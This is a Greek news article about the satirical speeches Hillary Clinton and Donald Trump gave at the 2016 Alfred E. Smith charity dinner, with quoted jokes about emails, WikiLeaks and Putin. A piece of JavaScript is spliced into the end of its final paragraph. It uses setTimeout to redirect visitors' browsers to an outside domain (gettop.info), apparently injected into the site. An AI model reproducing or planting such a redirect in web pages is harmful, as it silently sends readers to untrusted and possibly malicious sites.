«Στα βιβλία ψυχιατρικής θα μπει αυτή η εκστρατεία»-Βιτριολικό χιούμορ Κλίντον-Τραμπ σε φιλανθρωπικό δείπνο (ΕΙΚΟΝΕΣ)

0
33
REFILE- QUALITY REPEATDemocratic U.S. presidential nominee Hillary Clinton looks at Republican U.S. presidential nominee Donald Trump as he speaks during the Alfred E. Smith Memorial Foundation dinner to benefit Catholic charities in New York, U.S. October 20, 2016. REUTERS/Carlos Barria

 

Οι δύο προεδρικοί υποψήφιοι στην κούρσα για τον Λευκό Οίκο βρέθηκαν στο ίδιο τραπέζι -τους χώρισε μόνο ο καρδινάλιος Τίμοθι Ντόλαν- με αφορμή το δείπνο του ιδρύματος Alfred E. Smith, του πρώην κυβερνήτη της Νέας Υόρκης. (Πρόκειται για ετήσια φιλανθρωπική εκδήλωση με στόχο τη συγκέντρωση χρημάτων για τα παιδιά που έχουν ανάγκη).

Κλίντον - Τραμπ έβγαλαν μαχαίρια σε... φιλανθρωπικό δείπνο

Χίλαρι Κλίντον και Ντόναλντ Τραμπ σε μια πιο «χαλαρή» εμφάνιση μπορεί να αντάλλαξαν και πάλι εχθρικά βέλη, ωστόσο αυτή την φορά οι ομιλίες τους είχαν αρκετό αυτοσαρκασμό!

«Δεν ήμουν σίγουρος αν η Χίλαρι θα ερχόταν εδώ απόψε, καθώς, υποθέτω, δεν στείλατε την πρόσκληση μέσω email. Ή μάλλον το κάνατε και μόλις το ανακάλυψε μέσω της θαυματουργού υπηρεσίας των Wikileaks», είπε ο Τραμπ υπονοώντας ευθέως το σκάνδαλο με την ηλεκτρονική αλληλογραφία της πρώην υπουργού των ΗΠΑ.

«Αυτή είναι η πρώτη φορά στα χρονικά που η Χίλαρι παρακάθεται και δίνει ομιλία μπροστά σε επικεφαλής μεγάλων επιχειρήσεων και δεν πληρώνεται γι’ αυτό!», είπε στην συνέχεια.

Η Χίλαρι Κλίντον από την πλευρά της έκανε προσπάθειες για αυτοσαρκασμό, ωστόσο ούτε εκείνη παρέλειψε τα «καρφιά».

«Kανονικά, ξέρετε ότι πολλοί λένε πως για να βγάλω αυτή την ομιλία χρεώνω πολλά λεφτά», χαρακτήρισε ωστόσο «περίεργο που μπορώ να ανέβω στο βήμα μετά τον Ντόναλντ, δεν υπολόγιζα πως συμφωνεί με ομαλή μετάβαση» -αναφορά στην άρνησή του να δεσμευτεί για αναγνώριση του εκλογικού αποτελέσματος.

Ο Τραμπ, είπε, είναι «υγιέστερος όλων». «Είναι υγιής σαν άλογο, και εννοώ το άλογο που καβαλά ο Πούτιν» συνέχισε, συνδυάζοντας τις φήμες για την υγεία της με την κατηγορία που εξαπολύει εναντίον του Τραμπ πως είναι η «προτίμηση» του ρώσου προέδρου σε αυτές τις εκλογές.

Αστειεύτηκε δε απευθυνόμενη στον καθολικό αρχιεπίσκοπο πως «καταλαβαίνω από αυτά που είπατε πως δεν θα με κάνατε αγία, αλλά το ότι πέρασα τρία ντιμπέιτ με τον Τραμπ πρέπει τουλάχιστον να μου δίνει κάποιους πόντους».

Οι δηλώσεις του Άλφρεντ Σμιθ, που ήταν ο οικοδεσπότης της εκδήλωσης περιέγραψαν την ένταση εντός της αίθουσας, αλλά και στην προεκλογική εκστρατεία: «Είναι μία προεκλογική εκστρατεία για τα βιβλία της ιστορίας, αλλά και της ψυχιατρικής», τόνισε με νόημα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here